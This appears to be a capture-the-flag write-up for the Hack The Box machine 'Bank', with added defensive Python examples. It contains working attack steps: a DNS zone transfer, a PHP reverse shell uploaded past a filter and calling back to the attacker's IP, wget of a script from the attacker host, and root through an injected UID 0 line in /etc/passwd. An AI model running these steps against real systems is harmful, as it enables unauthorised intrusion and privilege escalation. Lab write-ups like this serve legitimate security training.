BANK

Enumeration

NMAP

The nmap scan shows ports 22, 53 and 80 open, so we can expect SSH, DNS and an HTTP web application. Let’s enumerate DNS first and then check out the findings in our browser.

Host is up (0.047s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

DNS Enumeration

# dig axfr @10.10.10.29 bank.htb      

; <<>> DiG 9.16.11-Debian <<>> axfr @10.10.10.29 bank.htb
; (1 server found)
;; global options: +cmd
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
bank.htb.               604800  IN      NS      ns.bank.htb.
bank.htb.               604800  IN      A       10.10.10.29
ns.bank.htb.            604800  IN      A       10.10.10.29
www.bank.htb.           604800  IN      CNAME   bank.htb.
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
;; Query time: 47 msec
;; SERVER: 10.10.10.29#53(10.10.10.29)
;; WHEN: Tue May 11 03:28:16 EDT 2021
;; XFR size: 6 records (messages 1, bytes 171)

Web App Enumeration

/etc/hosts

Add the IP address and the hostnames found in the zone transfer to /etc/hosts as:

10.10.10.29        bank.htb chris.bank.htb ns.bank.htb


Dirbuster

A couple of interesting directories were found for http://bank.htb, including /balance-transfer/, which is not present in the picture because the scan was still running.

The user and ticket files do not return anything, but the response header redirects to /, which looks unusually big when viewed in Burp Suite.

/balance-transfer/

Balance transfer is a directory which contains a bunch of encrypted account reports. While scrolling through the directory looking for something out of the ordinary, I found a file that is about 50% smaller than the rest.

When opened, it turns out that encryption failed for this one, since it is in plain text:

--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: [email protected]
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===
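The leak above is not a clever bypass; it is an export job that published a report whose encryption step failed. As an added example (not code from the original write-up or from the box), here is the kind of pre-publication check a defender would put in front of such a directory: it holds back any report that carries the failure marker, is far smaller than the median report, or is mostly printable text. The file names and the "opaque" filler standing in for encrypted reports are constructed; only the failure-marker layout mirrors the page.

```python
import statistics
from typing import Dict, List

FAILURE_MARKER = b"--ERR ENCRYPT FAILED"

# Constructed sample of a report export directory. Three files stand in for
# properly encrypted reports (opaque filler, not a real ciphertext format);
# the fourth reproduces the failed-encryption layout from the page with the
# personal fields redacted.
OPAQUE = bytes(range(256)) * 2 + b"\x00" * 68   # 580 bytes, mostly non-printable
FAILED = (
    b"--ERR ENCRYPT FAILED\n"
    b"+=================+\n"
    b"| HTB Bank Report |\n"
    b"+=================+\n\n"
    b"===UserAccount===\n"
    b"Full Name: <redacted>\n"
    b"Email: <redacted>\n"
    b"Password: <redacted>\n"
    b"CreditCards: 5\n"
    b"Transactions: 39\n"
    b"Balance: 8842803 .\n"
    b"===UserAccount===\n"
)
SAMPLE_EXPORT: Dict[str, bytes] = {
    "report-1": OPAQUE,
    "report-2": OPAQUE,
    "report-3": OPAQUE,
    "report-4": FAILED,
}


def printable_fraction(data: bytes) -> float:
    """Share of bytes that are printable ASCII, tab, LF or CR."""
    if not data:
        return 0.0
    text = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return text / len(data)


def find_unencrypted_reports(files: Dict[str, bytes], size_ratio: float = 0.6,
                             text_threshold: float = 0.9) -> List[str]:
    """Flag any report that (a) starts with the failure marker, (b) is far
    smaller than the median report, or (c) is mostly printable text.
    Any one reason is enough to hold the file back from publication."""
    if not files:
        return []
    median = statistics.median(len(d) for d in files.values())
    flagged = []
    for name in sorted(files):
        data = files[name]
        reasons = []
        if data.startswith(FAILURE_MARKER):
            reasons.append("failure marker")
        if len(data) < size_ratio * median:
            reasons.append(f"size {len(data)} below {size_ratio:.0%} of median {median:.0f}")
        if printable_fraction(data) >= text_threshold:
            reasons.append("mostly printable text")
        if reasons:
            flagged.append(f"{name}: " + "; ".join(reasons))
    return flagged


if __name__ == "__main__":
    for line in find_unencrypted_reports(SAMPLE_EXPORT) or ["nothing flagged"]:
        print(line)
```

The size and text-ratio checks matter because a failed job will not always be polite enough to write a marker; a plaintext record among ciphertext stands out on both measures regardless.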

Exploit

I logged in to the given account and discovered a Support page with file upload functionality, which reveals a possible attack surface.

LFI

There is a file upload restriction in place that prevents me from uploading anything other than images. Let’s bypass that with Burp Suite.

Burp Suite

After configuring php-reverse-shell.php from pentestmonkey to point to our own IP address, we try to upload it through the file upload form with intercept on. Once we capture the POST request, we send it to Repeater in order to work around the restrictions in place. And voila…

Shell

Open a nc listener to catch the reverse connection, then trigger the uploaded file.

$ curl "http://bank.htb/uploads/php-reverse-shell.php.jpeg" |php                                        
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  5492  100  5492    0     0  53843      0 --:--:-- --:--:-- --:--:-- 53843
PHP Notice:  Undefined variable: daemon in Standard input code on line 184
Successfully opened reverse shell to 10.10.14.3:1234

Yikes, I just hacked myself

Anyway… let’s try to forget about that and figure out my next move so as NOT to hack myself. I read in the source code that the developer added an exception for the .htb extension for debugging purposes, and that files with that extension are executed as PHP. So I uploaded the reverse shell with an .htb extension and just opened it, which returned a shell.

# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.29] 58982
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux
 12:37:52 up  2:18,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             [email protected]   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ 
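Two things went wrong in that upload form: the check looked only at the client-supplied extension, and a "debugging" exception let one more extension through that the server then executed. As an added example (not the box's PHP source, which is not reproduced on this page), here is the weak extension-only check next to a hardened validator in Python. The names `weak_is_allowed`, `validate_upload` and the constructed image samples are mine; the hardened version requires a single allowlisted extension, checks the leading bytes of the content, and picks a random storage name so the client never controls what is written to disk.

```python
import os
import re
import secrets

IMAGE_EXTENSIONS = ("jpg", "jpeg", "png", "gif")
DEBUG_EXTENSION = "htb"   # stand-in for the debugging exception the write-up mentions


def weak_is_allowed(filename: str) -> bool:
    """Extension-only check of the kind the write-up describes (illustrative).
    It trusts the client-supplied name, looks only at the final extension and
    carries a debug exception; nothing here inspects the content."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext in IMAGE_EXTENSIONS or ext == DEBUG_EXTENSION


# Leading bytes of the formats actually accepted.
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}
# One short lowercase name, exactly one dot, allowlisted extension: this
# rejects "x.php.jpeg", "x.htb" and anything containing a path separator.
SAFE_NAME = re.compile(r"^[a-z0-9_-]{1,64}\.(jpg|jpeg|png|gif)$")
MAX_BYTES = 2 * 1024 * 1024

# Constructed sample contents: correct magic bytes followed by filler.
PNG_SAMPLE = MAGIC["png"] + b"\x00" * 32
JPEG_SAMPLE = MAGIC["jpeg"] + b"\x00" * 32


def validate_upload(filename: str, content: bytes) -> str:
    """Return the server-chosen storage name, or raise ValueError."""
    base = os.path.basename(filename).lower()
    if not SAFE_NAME.match(base):
        raise ValueError(f"rejected name: {filename!r}")
    if not content or len(content) > MAX_BYTES:
        raise ValueError("rejected size")
    ext = base.rsplit(".", 1)[1]
    if not content.startswith(MAGIC[ext]):
        raise ValueError(f"content does not look like a {ext} file")
    lowered = content.lower()
    if b"<?php" in lowered or b"<?=" in lowered:
        # Defence in depth only: polyglot images exist, so this is not the
        # control that stops execution (that is the server config).
        raise ValueError("script tag inside image")
    # Random name: the client never chooses what is written to disk.
    return f"{secrets.token_hex(16)}.{ext}"


def is_accepted(filename: str, content: bytes) -> bool:
    """Convenience wrapper so the decision can be checked as a boolean."""
    try:
        validate_upload(filename, content)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for name, data in [("avatar.png", PNG_SAMPLE),
                       ("php-reverse-shell.php.jpeg", JPEG_SAMPLE),
                       ("shell.htb", PNG_SAMPLE)]:
        print(f"{name:30} weak={weak_is_allowed(name)!s:5} hardened={is_accepted(name, data)}")
```

Even with this validator, the decisive control is where the files land: keep the upload directory outside the document root, or configure the web server so nothing under it is ever handed to the PHP interpreter. A debug exception like the one on this box should never reach production, and a code review or a grep for the debug extension across the deployed source would have caught it.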

Privilege Escalation

We are logged in as www-data. To figure out our attack surface, I will run a script called unix-privesc-check. In the following lines I change to /tmp, because it is a writable directory, and download the script from my local Kali system.

┌──(kali㉿kali)-[~/bank]
└─$ sudo cp /usr/share/unix-privesc-check/unix-privesc-check .      

┌──(kali㉿kali)-[~/bank]
└─$ python3 -m http.server                                 
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.29 - - [11/May/2021 05:40:44] "GET /unix-privesc-check HTTP/1.1" 200 -
10.10.10.29 - - [11/May/2021 05:41:21] "GET /unix-privesc-check HTTP/1.1" 200 -
$ cd tmp
$ touch file
$ ls
file
vmware-root
$ wget http://10.10.14.3:8000/unix-privesc-check
--2021-05-11 12:45:15--  http://10.10.14.3:8000/unix-privesc-check
Connecting to 10.10.14.3:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 36801 (36K) [application/octet-stream]
Saving to: 'unix-privesc-check'

     0K .......... .......... .......... .....                100%  654K=0.05s

2021-05-11 12:45:16 (654 KB/s) - 'unix-privesc-check' saved [36801/36801]

$ 

Let’s upgrade our session to be more intuitive and responsive.

$ python -c 'import pty;pty.spawn("/bin/bash")'                 
[email protected]:/tmp$ export TERM=xterm                                                                                
export TERM=xterm                                                                                                    
[email protected]:/tmp$ ^Z                                                                                               
zsh: suspended  nc -nlvp 1234                                                                                        

┌──(root💀kali)-[/home/kali/bank]
└─# stty raw -echo;fg                                                                                      148 ⨯ 1 ⚙
[1]  + continued  nc -nlvp 1234

Now I have tab-completion and all keys register as normal.

[email protected]:/tmp$ chmod +x unix-privesc-check

[email protected]:/tmp$ ./unix-privesc-check standard

...[snip]...
############################################
    Checking if anyone except root can change /etc/passwd
WARNING: /etc/passwd is a critical config file. World write is set for /etc/passwd

OK, so we have a writable /etc/passwd file. Let’s add a privileged user and escalate. First, create a password hash:

$ openssl passwd -1 -salt hacker hacker
$1$hacker$TzyKlv0/R/c28R.GAeLw.1

Next, add the user as follows:

[email protected]:/$ nano /etc/passwd
#################################
add the user in the document like so:
hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash
#################################
[email protected]:/$ su hacker
Password: 
[email protected]:/# whoami
root
[email protected]:/# 
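The whole escalation rests on one misconfiguration (world write on /etc/passwd) and leaves two loud traces: a second UID 0 account and a password hash sitting in /etc/passwd instead of /etc/shadow. As an added example (not part of the original write-up or of unix-privesc-check), here is a small Python audit that checks the file's permission bits and parses its entries for exactly those signs. The sample passwd text is constructed to show what the file looks like after the step above; the hash in it is the one shown on this page.

```python
import os
import stat
from typing import Dict, List

# Constructed sample: an /etc/passwd after the extra UID 0 account from the
# write-up has been appended. The hash is the one shown on the page.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
chris:x:1000:1000:chris:/home/chris:/bin/bash
hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash
"""

FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")


def parse_passwd(text: str) -> List[Dict[str, str]]:
    """Parse passwd(5) lines; blank lines and comments are skipped."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        entries.append(dict(zip(FIELDS, fields)))
    return entries


def find_passwd_anomalies(text: str) -> List[str]:
    """Flag what someone with write access typically adds: a second UID 0
    account, and a hash placed directly in the password field, which makes
    /etc/shadow irrelevant for that account."""
    findings = []
    for e in parse_passwd(text):
        if e["uid"] == "0" and e["name"] != "root":
            findings.append(f"extra UID 0 account: {e['name']}")
        if e["passwd"] == "":
            findings.append(f"empty password field: {e['name']}")
        elif e["passwd"] not in ("x", "*", "!", "!!"):
            findings.append(f"password hash stored in /etc/passwd instead of /etc/shadow: {e['name']}")
    return findings


def mode_findings(mode: int, owner_uid: int, path: str = "/etc/passwd") -> List[str]:
    """Pure check on permission bits, so it can be exercised without root."""
    findings = []
    if mode & stat.S_IWOTH:
        findings.append(f"{path} is world-writable (mode {oct(mode & 0o777)})")
    if mode & stat.S_IWGRP:
        findings.append(f"{path} is group-writable (mode {oct(mode & 0o777)})")
    if owner_uid != 0:
        findings.append(f"{path} is not owned by root (uid {owner_uid})")
    return findings


def audit_passwd(path: str = "/etc/passwd") -> List[str]:
    """Run both checks against a real file."""
    st = os.stat(path)
    with open(path, encoding="utf-8") as fh:
        text = fh.read()
    return mode_findings(st.st_mode, st.st_uid, path) + find_passwd_anomalies(text)


if __name__ == "__main__":
    for finding in audit_passwd() or ["no findings"]:
        print(finding)
```

Run from cron or a config-management check, this catches both the precondition (the mode bits, which should be 0644 root:root) and the aftermath (the extra root account). The same two signals are what a file-integrity monitor such as AIDE or auditd rules on /etc/passwd would surface.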
